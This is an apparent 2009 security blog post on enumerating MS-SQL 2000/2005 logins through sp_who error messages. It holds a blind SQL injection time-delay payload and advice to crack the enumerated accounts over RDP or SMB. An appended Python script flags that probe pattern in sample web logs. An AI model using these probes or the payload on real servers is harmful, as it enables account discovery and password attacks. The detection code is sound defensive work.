MS-SQL [2000&2005] User Enumeration Via sp_who

February 5, 2009

In SQL Server 2005, if you are not ‘sa’ you can’t do much. This is primarily because OPENROWSET is not available by default unless you are privileged. The stored procedure sp_who is available to public (in MSSQL 2000 and 2005). This procedure “provides information about current Microsoft® SQL Server™ users and processes”.

Enumeration:

exec sp_who 'validuser';

returns no records (as you don't have privileges to see information about other users), but no errors either. :)

-------------------------

exec sp_who 'invaliduser';

returns error:

Msg 15007, Level 16, State 1, Procedure sp_who, Line 59
'invaliduser' is not a valid login or you do not have permission.

-------------------------

Hence, you can enumerate usernames. You can also enumerate Windows users (if mixed mode authentication is enabled) like this:

exec sp_who 'test-system\Administrator';

and possibly also the domain users, depending upon which domain users are allowed to connect (typically domain admins).

You need to know the valid machine_name/domain_name for this to work. But that’s not a problem, as it can be obtained from the following:

1. IIS NTLM authentication, which discloses the machine name and domain name (use hoppy).
2. The terminal services dialog box.
3. The stored procedure (sp_who) itself, which returns the hostname.
4. There are several other ways to obtain this.

After you have enumerated users, you know what to do next. Try cracking passwords through other services e.g. RDP, SMB etc.

Through SQL injection, use this PoC to enumerate logins (assuming a blind SQL injection):

http://127.0.0.1/upload/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEM\blah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'--

When the username is right, it will wait for 20 seconds.
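
A defender-side check for the pattern above, as an added example that is not part of the original post: it scans web access log entries for requests that pass a quoted login name to sp_who, flags the time-based variant (sp_who combined with WAITFOR DELAY), and reports clients that probe several distinct logins. The log entries, IP addresses, function names and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log entries: (client IP, request line). Not real traffic.
_PROBE = ("GET /upload/sqlinjection/?qid=1;BEGIN%20TRY%20exec%20sp_who%20'{}'%20END%20TRY"
          "%20BEGIN%20CATCH%20return%20END%20CATCH%20waitfor%20delay%20'00:00:20'-- HTTP/1.1")
SAMPLE_LOG = [
    ("198.51.100.9", "GET /upload/sqlinjection/?qid=1 HTTP/1.1"),
    ("203.0.113.7", _PROBE.format("sa")),
    ("203.0.113.7", _PROBE.format("TEST-SYSTEM%5Cblah")),
    ("203.0.113.7", _PROBE.format("TEST-SYSTEM%5CAdministrator")),
    ("203.0.113.7", _PROBE.format("webapp")),
    ("198.51.100.23", "GET /help?q=what+is+sp_who+for HTTP/1.1"),  # benign mention
]

# sp_who followed by a quoted argument: the login name being tested.
SP_WHO_ARG = re.compile(r"\bsp_who\s+N?'([^']*)'", re.IGNORECASE)
WAITFOR = re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE)

def is_timing_probe(request):
    """True when one request combines sp_who '<login>' with WAITFOR DELAY."""
    decoded = unquote_plus(request)
    return bool(SP_WHO_ARG.search(decoded) and WAITFOR.search(decoded))

def find_enumeration(entries, min_logins=3):
    """Map client IP -> sorted distinct logins probed, for clients at or above min_logins."""
    probed = defaultdict(set)
    for ip, request in entries:
        for match in SP_WHO_ARG.finditer(unquote_plus(request)):
            probed[ip].add(match.group(1).lower())
    return {ip: sorted(names) for ip, names in probed.items() if len(names) >= min_logins}

if __name__ == "__main__":
    for ip, logins in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: sp_who probed with {len(logins)} distinct logins: {logins}")
```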
